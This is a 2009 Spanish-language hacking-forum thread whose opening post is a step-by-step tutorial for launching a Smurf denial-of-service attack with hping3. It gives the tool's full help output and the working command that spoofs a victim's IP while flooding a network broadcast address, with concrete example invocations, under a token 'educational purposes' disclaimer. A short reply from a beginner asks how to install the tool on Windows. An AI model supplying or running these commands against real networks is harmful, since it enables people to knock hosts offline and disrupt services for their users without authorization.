Comunidad Underground Hispana  

Retroceder   Comunidad Underground Hispana > Redes y Comunicaciones > Networking & Wireless

Respuesta Crear Nuevo Tema
 
Compartir en twitter LinkBack Herramientas Desplegado
Antiguo 12-abr-2009, 10:11   #1
Defc0n1
Guest
 
Amigos
Mensajes: n/a
Predeterminado [Técnica] Haciendo ataque DoS Smurf usando Hping. Por Defc0n1

Introducción
Un ataque DoS (Denial of service / Denegacion de servicio) tiene como objetivo tirar abajo un host temporalmente congelandolo, o definitivamente hasta que se reinicie.
En este manual vamos a ver como podemos hacer un ataque DoS del tipo Smurf. El ataque Smurf se basa en enviar paquetes de ping al broadcast de una red grande haciendo un spoofing a la direccion IP que envia la peticion. Asi, todos los ordenadores de la red (el broadcast) contestaran a la vez a la maquina que queremos atacar (la IP spoofeada), y si hay muchas peticiones esta seguramente se colapse.
Además añadiremos la funcion flood para que el envio de paquetes sea masivo.

No me hago responsable de los daños que se puedan hacer usando este manual. Es con fines educativos, nunca nocivos.

Para todo esto usaremos el programa Hping, que ya va por su version 3. Por lo tanto usaremos hping3
Desarrollo
Lo primero es instalar el programa hping.
http://www.hping.org/download.php

Nosotros vamos a usar la version de GNU/Linux, la cual se puede instalar mediante los repositorios. Tambien podemos usar una distribucion orientada a la seguridad informatica como Backtrack, donde seguramente ya este incluida la herramienta.

Aqui esta la ayuda del programa:
Código:
xxxxx@xxxxx:~$ hping3 --help
usage: hping3 host [options]
 -h --help   show this help
 -v --version  show version
 -c --count   packet count
 -i --interval wait (uX for X microseconds, for example -i u1000)
   --fast   alias for -i u10000 (10 packets for second)
   --faster  alias for -i u1000 (100 packets for second)
   --flood	  sent packets as fast as possible. Don't show replies.
 -n --numeric  numeric output
 -q --quiet   quiet
 -I --interface interface name (otherwise default routing interface)
 -V --verbose  verbose mode
 -D --debug   debugging info
 -z --bind   bind ctrl+z to ttl      (default to dst port)
 -Z --unbind  unbind ctrl+z
   --beep   beep for every matching packet received
Mode
 default mode   TCP
 -0 --rawip   RAW IP mode
 -1 --icmp    ICMP mode
 -2 --udp    UDP mode
 -8 --scan    SCAN mode.
          Example: hping --scan 1-30,70-90 -S www.target.host
 -9 --listen   listen mode
IP
 -a --spoof   spoof source address
 --rand-dest   random destionation address mode. see the man.
 --rand-source  random source address mode. see the man.
 -t --ttl    ttl (default 64)
 -N --id     id (default random)
 -W --winid   use win* id byte ordering
 -r --rel    relativize id field     (to estimate host traffic)
 -f --frag    split packets in more frag. (may pass weak acl)
 -x --morefrag  set more fragments flag
 -y --dontfrag  set dont fragment flag
 -g --fragoff  set the fragment offset
 -m --mtu    set virtual mtu, implies --frag if packet size > mtu
 -o --tos    type of service (default 0x00), try --tos help
 -G --rroute   includes RECORD_ROUTE option and display the route buffer
 --lsrr      loose source routing and record route
 --ssrr      strict source routing and record route
 -H --ipproto  set the IP protocol field, only in RAW IP mode
ICMP
 -C --icmptype  icmp type (default echo request)
 -K --icmpcode  icmp code (default 0)
   --force-icmp send all icmp types (default send only supported types)
   --icmp-gw  set gateway address for ICMP redirect (default 0.0.0.0)
   --icmp-ts  Alias for --icmp --icmptype 13 (ICMP timestamp)
   --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
   --icmp-help display help for others icmp options
UDP/TCP
 -s --baseport  base source port       (default random)
 -p --destport  [+][+]<port> destination port(default 0) ctrl+z inc/dec
 -k --keep    keep still source port
 -w --win    winsize (default 64)
 -O --tcpoff   set fake tcp data offset   (instead of tcphdrlen / 4)
 -Q --seqnum   shows only tcp sequence number
 -b --badcksum  (try to) send packets with a bad IP checksum
          many systems will fix the IP checksum sending the packet
          so you'll get bad UDP/TCP checksum instead.
 -M --setseq   set TCP sequence number
 -L --setack   set TCP ack
 -F --fin    set FIN flag
 -S --syn    set SYN flag
 -R --rst    set RST flag
 -P --push    set PUSH flag
 -A --ack    set ACK flag
 -U --urg    set URG flag
 -X --xmas    set X unused flag (0x40)
 -Y --ymas    set Y unused flag (0x80)
 --tcpexitcode  use last tcp->th_flags as exit code
 --tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
 -d --data    data size          (default is 0)
 -E --file    data from file
 -e --sign    add 'signature'
 -j --dump    dump packets in hex
 -J --print   dump printable characters
 -B --safe    enable 'safe' protocol
 -u --end    tell you when --file reached EOF and prevent rewind
 -T --traceroute traceroute mode       (implies --bind and --ttl 1)
 --tr-stop    Exit when receive the first not ICMP in traceroute mode
 --tr-keep-ttl  Keep the source TTL fixed, useful to monitor just one hop
 --tr-no-rtt	  Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
 --apd-send    Send the packet described with APD (see docs/APD.txt)
  
El comando a usar para hacer DoS a un objetivo dentro de una red local es el siguiente:
Código:
hping3 -a [IP objetivo a spoofear] --flood [IP Broadcast]
Aviso -> Teneis que tener permisos de root para hacer el flooding
Ejemplos
hping -a 192.168.1.32 --flood 192.168.1.255
sudo hping -a 192.168.1.32 --flood 192.168.1.255
  
-a -> Sirve para spoofear la IP de la red desde donde supuestamente viene la peticion ping
--flood -> Sirve para meter ping flooding
sudo -> Para dar los permisos de administrador si no se tienen.

Recordad que para hacer esto hay que estar en una red grande, que genere tantos paquetes a la vez como para colapsar la maquina.

Mas informacion en la wikipedia -> http://es.wikipedia.org/wiki/Smurf_ataque
  Responder Citando
Antiguo 08-jun-2010, 19:24   #2
Recien llegado
 
Fecha de Ingreso: junio-2010
Amigos 0
Mensajes: 1
Gracias: 0
Agradecido 0 veces en 0 mensajes.
Predeterminado

la verdad poco entiendo ya que soy novato :P, pero aun asi kisiera saber como instalar hping, o como ejecutarlo, me parece muy intresante el tema, pero hace falta algo de informacion requerida por los novatos como yo...

si no es mucha molestia, por favor explica como instalar en si el Hping desde Windows XP...

Recuerden que soy novato en el tema,
yesid093 está desconectado   Responder Citando
Respuesta

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks están Activado
Pingbacks están Activado
Refbacks están Activado



Temas Similares
Tema Autor Foro Respuestas Último mensaje
[Técnica] Crackeando encriptacion WEP y WPA/WPA2 con Aircrack-ng. Por Defc0n1 Defc0n1 Wireless (Wi-Fi) 90 22-sep-2012 16:05
[Técnica] Conectar a Wifi mediante consola Bash (GNU/Linux). Por Defc0n1 Defc0n1 Networking & Wireless 1 06-may-2009 21:35
Alguien probó el hping en windows xp SP2? GHRigel Networking & Wireless 1 23-ene-2009 19:45
Hping Automation port scanner netscape Perl 0 16-dic-2008 05:37
Ataque Smurf + Spoofing Hendrix HacK GeneraL 0 03-feb-2006 08:57



Portal Hacker
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2015, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0